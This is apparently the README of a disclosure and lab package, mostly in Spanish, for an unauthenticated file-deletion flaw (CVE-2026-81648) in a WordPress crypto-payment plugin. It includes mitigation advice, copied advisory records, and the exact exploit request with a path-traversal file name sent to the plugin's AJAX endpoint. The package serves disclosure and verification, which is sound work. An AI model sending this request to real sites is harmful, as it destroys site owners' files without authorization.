
Prueba de concepto de exploit y laboratorio para CVE-2026-81648, una vulnerabilidad de eliminación arbitraria de archivos sin autenticación en el plugin CryptoPayment Gateway de WordPress.
abraxaslabs.tech · github.com/abraxas · @abraxas_null · CVE-2026-81648
WordPress — CryptoPayment Gateway 1.2.2 — Granwill
El plugin de WordPress CryptoPayment Gateway desde la 1.2.1 hasta la 1.2.2 no aplica una comprobación de autorización en uno de sus endpoints AJAX, lo que permite a usuarios no autenticados invocar operaciones administrativas, incluyendo la eliminación de archivos arbitrarios en el servidor, la sobrescritura de la configuración de la pasarela de pago y la recuperación de credenciales de cartera almacenadas en texto claro.
| CVE | CVE-2026-81648 · CVE.org |
| CWE | CWE-862 |
| CVSS | Crítico: 10.0 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Producto | WordPress — CryptoPayment Gateway |
| Afectado | 1.2.1–1.2.2 |
| Parcheado | sin parche público (WPScan: sin corrección conocida) |
| Auth | ninguna (ver mapa de código fuente) |
| Licencia | GNU Affero GPL v3.0 |
| Lab | solo 127.0.0.1 · paquete de divulgación para el proveedor/cliente, no un escáner |
delete-file en cryptd/ajax.php es el sink. HTTP es ese archivo PHP, no admin-ajax.php.
POST/wp-content/plugins/cryptopayment-gateway/vendor/cryptd/ajax.phpGET /wp-content/poc81648/index.php expect POCWitness81648POST ajax.php data={"function":"delete-file","file_name":"../../../../../poc81648/index.php","folder":""}crpay_file_delete unlinks wp-content/poc81648/index.phpGET witness URL no POCWitness81648POCWitness81648 presente antes del POST, ausente después. Un JSON de éxito sin la eliminación no cuenta.
Haz esto primero: No hay parche público. Deshabilita CryptoPayment Gateway o bloquea vendor/cryptd/ajax.php hasta que exista una versión del proveedor.
Verificar tras la actualización
CVE-2026-81648-Abraxas-Labs.py contra la compilación parcheada: el testigo mapeado no debe aparecer.Si no puedes actualizar de inmediato
Objetivo solo http://127.0.0.1:8088 (o el loopback que hayas vinculado). No apuntes este script a internet.
python3 CVE-2026-81648-Abraxas-Labs.py
El éxito es el testigo anterior en el cuerpo de la respuesta. Un HTML 200 genérico no cuenta.
Stack de loopback usado para reproducir. Imágenes oficiales a menos que un Dockerfile en esta carpeta compile desde el código fuente.
cd lab
docker compose up --force-recreate
Vincula el árbol del producto vulnerable junto a Compose si el YAML monta un directorio local (zip del plugin / etiqueta de código fuente de la tabla de versiones). No publiques nada excepto 127.0.0.1.
wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898/
wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898
Directorio de plugins: cryptopayment-gateway
Navegador Trac: plugins.trac.wordpress.org/cryptopayment-gateway
Etiquetas SVN: plugins.svn.wordpress.org/cryptopayment-gateway
Abraxas Labs: abraxaslabs.tech · github.com/abraxas · @abraxas_null
# CVE-2026-81648 (structured records)
- input: `https://nvd.nist.gov/vuln/detail/CVE-2026-81648`
- CWE: CWE-862
- published: 2026-09-13T21:17:01.930
## NVD description
The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.
## MITRE description
The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.
## Affected
- Unknown CryptoPayment Gateway 1.2.1 affected
## References (JSON sources only)
- https://wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898/
- https://github.com/advisories/GHSA-9r3q-6qw8-8pm7
- https://nvd.nist.gov/vuln/detail/CVE-2026-81648
- https://wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898
## GitHub advisory
The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization...
The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.
Este paquete de divulgación está licenciado bajo la GNU Affero General Public License v3.0. Ver LICENSE.
Este paquete es para el proveedor, el propietario del sitio y los labs autorizados. El script se comunica con 127.0.0.1. Usarlo contra sistemas que no posees no está autorizado por Abraxas Labs. Sin garantía.